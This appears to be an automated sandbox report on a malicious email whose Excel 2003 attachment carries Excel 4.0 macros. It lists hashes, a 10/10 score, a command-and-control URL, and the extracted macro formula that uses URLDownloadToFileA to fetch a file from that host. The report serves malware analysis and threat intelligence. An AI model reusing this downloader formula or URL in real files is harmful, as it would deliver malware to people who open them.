Overview

overview

10

Static

static

10

document-3...88.xls

windows7_x64

10

document-3...88.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    message__B1F416F39D94659FBC75B63C8DBB85084453114A_unknown_.eml

  • Size

    19KB

  • MD5

    542b0d9ad4364dbfba25e1231f713b00

  • SHA1

    c4872e70d14d270a62abdc03f32759c73f4ff107

  • SHA256

    5a567d8a0d5aac4ed14b29827109754543d099a2d95b97e2173ceccf87d5f6b7

  • SHA512

    53a59387173ad6a8dc36d7b6ad7f5c4aebf5c37d0b4af3a17f9e0d19254959f77d59fa50e0a49c4c7f363e1ba67ae235aa6ed2efd1a22b92607559929b50e459

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://dzw10jpcgj03fckc.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • message__B1F416F39D94659FBC75B63C8DBB85084453114A_unknown_.eml
    .eml
  • email-plain-1.txt
  • prepared (79).zip
    .zip
  • document-386407988.xls
    .xls windows office2003